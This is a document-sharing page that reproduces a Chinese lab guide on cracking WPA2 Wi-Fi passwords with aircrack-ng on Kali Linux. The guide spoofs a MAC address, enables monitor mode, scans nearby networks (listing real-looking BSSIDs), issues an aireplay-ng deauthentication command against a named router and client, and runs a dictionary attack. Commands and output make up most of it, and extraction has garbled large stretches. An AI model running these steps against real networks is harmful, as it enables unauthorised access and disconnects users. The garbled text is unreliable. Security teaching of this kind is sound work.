工业互联网安全测试技术:IEEE渗透测试.docx

上传人:太** 文档编号:72646010 上传时间:2023-02-13 格式:DOCX 页数:4 大小:154.97KB
返回 下载 相关 举报
工业互联网安全测试技术:IEEE渗透测试.docx_第1页
第1页 / 共4页
工业互联网安全测试技术:IEEE渗透测试.docx_第2页
第2页 / 共4页
点击查看更多>>
资源描述

《工业互联网安全测试技术:IEEE渗透测试.docx》由会员分享,可在线阅读,更多相关《工业互联网安全测试技术:IEEE渗透测试.docx(4页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。

1、IEEE802.il协议测试实验文档实验原理首先要抓包:这一步主要靠网卡。握手包:无线信号是加密的,如果要连接无线路由器,就要给路由器发送一个请求,请 求和无线路由器建立连接,这个请求就在一要发送的数据包里,学名叫握手包,这个包里面 包含了你送过去的一个密码,但是这个密码是加密的。要破解无线网络连接,首先要抓到这 个包,里面有加密过的密码,只要抓到这个包,再用电脑根据这个加密后的数据反算密码就 行了。握手包只在设备与路由器刚开始连接的时候由设备发送给路由器,认证成功后就不再发 送了,所以要想抓住这个包我们必须等到有设备和路由器刚要建立连接时来抓,当然有更好 的方法,就是用一个方法断开一个已经连

2、接到路由器的设备,等它再自动和路由器连接的时 候抓住那个握手包。其次是跑包:这一步就和网卡没有关系了,全靠电脑和字典。跑包:跑包就是用同样的算法把字典里的密码加密,然后将结果与握手包里的密文进行 比对。如果一样那么也就知道了原密码,也就是拿密码一个个的试,看看哪个是对的。因此 跑包能不能跑出来完全取决字典里有没有包含真正的密码。实验目的利用Aircrack-Ng无线攻击工具,抓IEEE802.il协议包,利用字典爆破的手段来获取密码。实验环境Kali Linux操作系统无线网卡1个推荐课时数:2课时实验步骤1.设置无线网卡(1)准备一个无线网卡,将其插入电脑的USB接口处,如下图:图1无线网卡

3、 翻开Kali Linux系统,点击无线攻击工具里面的aircrack-ng,进入该工具的命令行终端, 如下图(依次点击红笔圈出来的局部):件 kali06:00下午O OaZE-0收黑 篮牙工艮等。国近使用* 无线工Ml全图加用卷律 x. wrS n ,充 rr赢 alrcrack-ng虱01信息收集fern wifi cracker色)02-舄H分析T kismetQ 03 Web相序0004-敛(唐仔估软件% pixiewps9 05空码JS击:reaver够06-无靖攻击$ wifite阳07-迎向丁桂U108及洞利用工月某6 09-尊探/欺幅2 10-权琮G符。11-数字取证Q12Q

4、 13-Social EngineeringTools 42-KdU&OffSec Links常用程序V i9E kaliv e /genericavxSUavx2avxsse2图2进入工具界面(3)使用airmon-ng命令查看当前系统中的无线网络接口。执行命令如下列图所示:(kaliL-$ sudo airmon-ngChipsetXiaomi Inc. MediaTek MT7601U MI WiFiPHYInterfaceDriverphy0wlan0mt7601u图3查看无线网络接口输出的信息表示,当前系统中存在一个无线网络接口。从输出结果的Interface歹IJ,可以 看到当前系

5、统的无线接口为wlanO。(4)修改wlanO接口的MAC地址。因为MAC地址标识主机所在的网络,修改主机的MAC 地址可以隐藏真实的MAC地址。在修改MAC地址之前,需要停止该接口。执行命 令如下列图所不:文件动作编辑查看帮助 i-Fconfig wlan0 down/home/kali图4停止无线网卡接口(5)执行以上命令后,wlanO接口那么停止。此时就可以修改MAC地址了,执行命令如下 图所示:1- macchanger Current MAC: Permanent MAC: New MAC:/home/kali00:11:226e:46:2b:9c:14 b8:de:5e:55:15

6、 00:11:22:33:4433:44:55 wlanO fa (unknown) fb (unknown)55 (CIMSYS Inc)图5修改无线网卡MAC地址输出的信息显示了 wlanO接口永久的MAC地址、当前的MAC地址及新的MAC地址。 可以看到wlanO接口的MAC地址已经被修改。(6)重新启动wlanO。执行命令如下列图所示:9 )-/home/kaliairmon-ng start wlanOFound 2 processes that could cause trouble.Kill them using airmon-ng check kill before putti

7、ngthe card in monitor mode, they will interfere by changing channelsand sometimes putting the interface back in managed modePID Name474 NetworkManager1247 wpa_supplicantPHYInterfaceDriverChipsetphy0wlanOmt7601uXiaomi Inc. MediaTek MT7601U MI WiFi(monitor mode enabled)图6启动无线网卡2.抓取数据包(1)使用airodump命令定位

8、附近所有可用的无线网络。执行命令如下列图所示:9)-/home/kaliairodump-ng wlanOCH 1 Elapsed:18 S2021-11-19 11:28BSSIDPWRBeacons#Data,#/sCHMBENC CIPHERAUTHESSID0A:69:6C:AD:96:0F-7712011130WPA2CCMPMGT7D:51:01:6B:B5:6A-10002-1D4:EE:07:64:EE:40-44133908720WPA2CCMPPSK2 楼 WIFI18:BC:5A:74:FA:B0-4813001360WPA2CCMPPSKvwwtf .qingguoap

9、p 22:BC:5A:74:FA:B0-4813001360WPA2CCMPPSK1E:BC:5A:74:FA:B0-4914001360WPA2CCMPPSKwwaa/ .qingguoapp guest0A:69:6C:C2:D5:E2-53141701130WPA2CCMPMGTC8:D3:A3:86:7D:A9-556001165WPA2CCMPPSKD-Link_DIR-600M1E:69:6C:C2:D5:E2-5314001130WPA2CCMPMGTeduroam06:69:6C:C2:D5:E2-5314001130OPN1E:69:6C:C2:B9:FE-581400113

10、0WPA2CCMPMGTeduroam0A:69:6C:C2:B9:FE-5715001130WPA2CCMPMGT06:69:6C:C2:B9:FE-5915001130OPN1E:69:6C:C2:BC:CE-619001130WPA2CCMPMGTeduroam00:36:76:6E:EF:01-6014101135WPA2CCMPPSKIELTS38:E1:AA:12:5E:1D-608009130WPA2CCMPPSKChinaNet-ciQi图7定位无线网络以上输出的信息显示了附近所有可用的无线网络。当找到用户想要攻击的无 线路由器时,按下Ctrl+C键停止搜索。从输出的信息中看到

11、有很多参数。详细介绍如下所示。 BSSID:无线的MAC地址PWR:网卡报告的信号水平。 Beacons:无线发出的通告编号。 Data:被捕获到的数据分组的数量,包括广播分组。 /s:过去10秒钟内每秒捕获数据分组的数量。 CH:信道号(从Beacons中获取)。 MB:无线所支持的最大速率。如果它是802.11b;如果 MB=22,它是802.11b+;如果更高就是802.11g。后面的点(高于 54之后)说明支持短前导码。 ENC:使用的加密算法体系。OPN表示无加密。WEP?表示WEP或 者WPA/WPA2模式,WEP (没有问号)表示静态或动态WEP。如果 出现TKIP或CCMP,那

12、么就是WPA/WPA2。 CIPHER:检测到的力密算法,是CCMP、WRAAP、TKIP、WEP和 WEP104中的一个。典型的来说(不一定),TKIP与WPA结合使 用,CCMP与WPA2结合使用。如果密钥索引值大于0,显示为 WEP40o标准情况下,索引0-3是40bk104bit应该是0。 AUTH:使用的认证协议。常用的有MGT (WPA/WPA2使用独立的认 证服务器,平时我们常说的802.1x、radius和eap等)、SKA (WEP 的共享密钥)、PSK (WPA/WPA2的预共享密钥)或者OPN (WEP 开放式)。 ESSID:指所谓的SSID号。如果启用隐藏的SSID的

13、话,它可以为 空。这种情况下,airodump-ng试图从proberesponses和 associationrequests 中获取 SSID。(2)捕获数据包。执行命令如下列图所示:9 /home/kaliairodump-ng 1 wirelessattack i 1E:BC:5A:74:FA:B0 wlan0 11:38:17 Created capture file wirelessattack-01.cap.图8抓取数据(3)输入 aireplay-ng -deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33: 44:55 wlanO 对无 线

14、路由器进行Deauth攻击。(4)破解密码。执行命令如下列图所示:(kali kali)-I- aircrack-ng ./dic/wordlist wirelessattack-01.ca/ Reading packetst please wait .Opening wirelessattack-01.cap Read 28443 packets.Reading packets, please wait .Opening wirelessattack-01.cap Read 28443 packets.0 potential targetsNo matching network found - check your essid.Quitting aircrack-ng .图9密码破解图中显示密码没有破解成功,其中有可能是密码复杂度过高导致的,或者是抓取的数据包 还不够多,密码爆破的样本太少。对于复杂的无线网络密码,可以多截取数据进行爆破。

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 应用文书 > 解决方案

本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

工信部备案号:黑ICP备15003705号© 2020-2023 www.taowenge.com 淘文阁